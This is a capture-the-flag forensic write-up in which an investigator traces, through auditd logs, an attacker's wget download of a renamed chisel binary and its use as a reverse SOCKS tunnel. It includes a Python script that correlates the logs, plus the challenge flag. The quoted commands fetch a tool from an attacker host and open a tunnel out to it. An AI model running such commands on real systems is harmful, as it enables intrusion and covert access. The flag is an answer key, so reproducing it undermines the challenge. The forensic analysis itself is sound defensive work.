Statement: In June 2023, an operator of vital importance falls victim to an attack that compromises its entire information system. You have received the Linux and Windows logs and must answer the investigators’ questions.

Note: The parts are numbered in the chronological order of the attack, but it is not necessary to solve them in order.

The attacker used the reverse shell in question 2 to download a tool. He then executed this tool.

Find the URL of the download and the original name of the tool (the binary having been renamed).

Flag format: FCSC{URL|ORIGINAL_NAME}

Example: FCSC{https://10.42.43.44/toto|nmap}


Following SOCrate - Reverse shell challenge, I need to find the downloaded binary.

I search for the strings wget and http://:

# cat linux/*.log | grep -i "execve" | grep "wget" | grep "http://"

node=webserver type=EXECVE msg=audit(1686646267.966:2918): argc=2 a0="wget" a1="http://80.125.9.58/cat"
node=webserver type=EXECVE msg=audit(1686646380.058:2930): argc=2 a0="wget" a1="http://80.125.9.58:80/text"
node=webserver type=EXECVE msg=audit(1686646703.870:3009): argc=2 a0="wget" a1="http://80.125.9.58:80/text"

I noticed some downloads, so I searched for text:

# cat linux/*.log | grep -i "execve" | grep "./text"

...
node=webserver type=EXECVE msg=audit(1686822736.877:13593): argc=5 a0="./text" a1="client" a2="-v" a3="80.125.9.58:4444" a4="R:socks"
node=webserver type=EXECVE msg=audit(1686829485.797:13789): argc=6 a0="sudo" a1="./text" a2="client" a3="-v" a4="80.125.9.58:4444" a5="R:socks"
...

The renamed binary matches the well-known chisel, which sets up TCP/UDP tunnels transported over HTTP; the client ... R:socks arguments seen above are chisel's client syntax for a reverse SOCKS tunnel.
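The same download-then-execute correlation, as an added Python example that is not part of the original writeup: it parses auditd EXECVE records in the format quoted above (the sample lines are reconstructed from the page), maps each URL fetched by wget or curl to the basename of the saved file, and reports later executions of that name, looking through a leading sudo. Hex-encoded (unquoted) arguments, which auditd emits for values with special characters, are skipped.

```python
import re

# Constructed sample in the auditd EXECVE format shown in the writeup.
SAMPLE_LOG = """\
node=webserver type=EXECVE msg=audit(1686646267.966:2918): argc=2 a0="wget" a1="http://80.125.9.58/cat"
node=webserver type=EXECVE msg=audit(1686646380.058:2930): argc=2 a0="wget" a1="http://80.125.9.58:80/text"
node=webserver type=EXECVE msg=audit(1686822736.877:13593): argc=5 a0="./text" a1="client" a2="-v" a3="80.125.9.58:4444" a4="R:socks"
node=webserver type=EXECVE msg=audit(1686829485.797:13789): argc=6 a0="sudo" a1="./text" a2="client" a3="-v" a4="80.125.9.58:4444" a5="R:socks"
"""

RECORD_RE = re.compile(r"msg=audit\((?P<ts>\d+\.\d+):(?P<id>\d+)\)")
ARG_RE = re.compile(r'\ba(\d+)="([^"]*)"')   # only quoted aN= fields
DOWNLOADERS = {"wget", "curl"}

def parse_execve(line):
    """Return (timestamp, event_id, argv) for one EXECVE record, else None."""
    if "type=EXECVE" not in line:
        return None
    m = RECORD_RE.search(line)
    if not m:
        return None
    # Rebuild argv by argument index so ordering on the line does not matter.
    argv = [v for _, v in sorted((int(n), v) for n, v in ARG_RE.findall(line))]
    return float(m.group("ts")), int(m.group("id")), argv

def strip_wrappers(argv):
    """Drop a leading 'sudo' so the real program is argv[0]."""
    while argv and argv[0] == "sudo":
        argv = argv[1:]
    return argv

def correlate_downloads(log_text):
    """Return [(event_id, source_url, argv)] for executions of downloaded files."""
    downloads = {}   # basename of fetched file -> URL it came from
    findings = []
    for line in log_text.splitlines():
        rec = parse_execve(line)
        if rec is None:
            continue
        _ts, eid, argv = rec
        argv = strip_wrappers(argv)
        if not argv:
            continue
        if argv[0] in DOWNLOADERS:
            for a in argv[1:]:
                if a.startswith(("http://", "https://")):
                    downloads[a.rsplit("/", 1)[-1]] = a
        elif argv[0].rsplit("/", 1)[-1] in downloads:
            findings.append((eid, downloads[argv[0].rsplit("/", 1)[-1]], argv))
    return findings
```

Feeding the real linux/*.log files through correlate_downloads gives the URL and the argv of each execution in one pass, instead of two chained greps.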

Flag: FCSC{http://80.125.9.58:80/text|chisel}